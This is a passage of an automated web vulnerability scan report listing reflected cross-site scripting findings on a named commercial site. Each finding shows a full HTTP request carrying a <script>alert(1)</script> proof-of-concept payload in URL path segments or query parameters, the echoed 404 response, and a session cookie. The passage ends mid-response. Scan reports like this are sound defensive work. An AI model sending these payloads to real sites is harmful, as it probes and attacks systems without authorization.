The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 88d6d<script>alert(1)</script>db35f4838e6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images88d6d<script>alert(1)</script>db35f4838e6/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images88d6d<script>alert(1)</script>db35f4838e6/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5327. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7ee4f<script>alert(1)</script>4a7fa34228a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/review7ee4f<script>alert(1)</script>4a7fa34228a/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review7ee4f<script>alert(1)</script>4a7fa34228a/0.gif was not found on this server.</p>
...[SNIP]...

2.5328. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 1b1a8<script>alert(1)</script>a67067f925a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/0.gif1b1a8<script>alert(1)</script>a67067f925a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/0.gif1b1a8<script>alert(1)</script>a67067f925a was not found on this server.</p>
...[SNIP]...

2.5329. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fdc27<script>alert(1)</script>2714fca71ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/0.gif?fdc27<script>alert(1)</script>2714fca71ae=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/0.gif?fdc27<script>alert(1)</script>2714fca71ae=1 was not found on this server.</p>
...[SNIP]...

2.5330. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9937<script>alert(1)</script>eb7b3b9a721 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicea9937<script>alert(1)</script>eb7b3b9a721/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicea9937<script>alert(1)</script>eb7b3b9a721/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5331. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d8fb2<script>alert(1)</script>bb34a93f238 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scriptsd8fb2<script>alert(1)</script>bb34a93f238/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scriptsd8fb2<script>alert(1)</script>bb34a93f238/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5332. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1e7c1<script>alert(1)</script>14c565a88c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes1e7c1<script>alert(1)</script>14c565a88c0/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes1e7c1<script>alert(1)</script>14c565a88c0/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5333. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9e598<script>alert(1)</script>ca4c4d3c0e1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos9e598<script>alert(1)</script>ca4c4d3c0e1/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos9e598<script>alert(1)</script>ca4c4d3c0e1/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5334. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 401fd<script>alert(1)</script>32972e0cdd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images401fd<script>alert(1)</script>32972e0cdd/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images401fd<script>alert(1)</script>32972e0cdd/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5335. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b81bd<script>alert(1)</script>5c6035e9a59 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/reviewb81bd<script>alert(1)</script>5c6035e9a59/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/reviewb81bd<script>alert(1)</script>5c6035e9a59/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5336. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload be498<script>alert(1)</script>c9ebadf3036 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/search.phpbe498<script>alert(1)</script>c9ebadf3036?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/search.phpbe498<script>alert(1)</script>c9ebadf3036?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5337. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d8365<a>7174488aed2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchd8365<a>7174488aed2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchd8365<a>7174488aed2&opt=2 was not found on this server.</p>
...[SNIP]...

2.5338. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 89ae0<a>61e72d6e6c7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...89ae0<a>61e72d6e6c7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...89ae0<a>61e72d6e6c7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5339. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c3582<script>alert(1)</script>606241ba109 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&c3582<script>alert(1)</script>606241ba109=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&c3582<script>alert(1)</script>606241ba109=1 was not found on this server.</p>
...[SNIP]...

2.5340. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7070b<a>c20dbd17c52 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=27070b<a>c20dbd17c52 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=27070b<a>c20dbd17c52 was not found on this server.</p>
...[SNIP]...

2.5341. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd151<script>alert(1)</script>655c68e9b9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicefd151<script>alert(1)</script>655c68e9b9d/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicefd151<script>alert(1)</script>655c68e9b9d/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5342. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f06f9<script>alert(1)</script>76293082351 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scriptsf06f9<script>alert(1)</script>76293082351/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scriptsf06f9<script>alert(1)</script>76293082351/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5343. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 225b2<script>alert(1)</script>94868ef74b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes225b2<script>alert(1)</script>94868ef74b0/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:54 GMT
Server: Apache/2
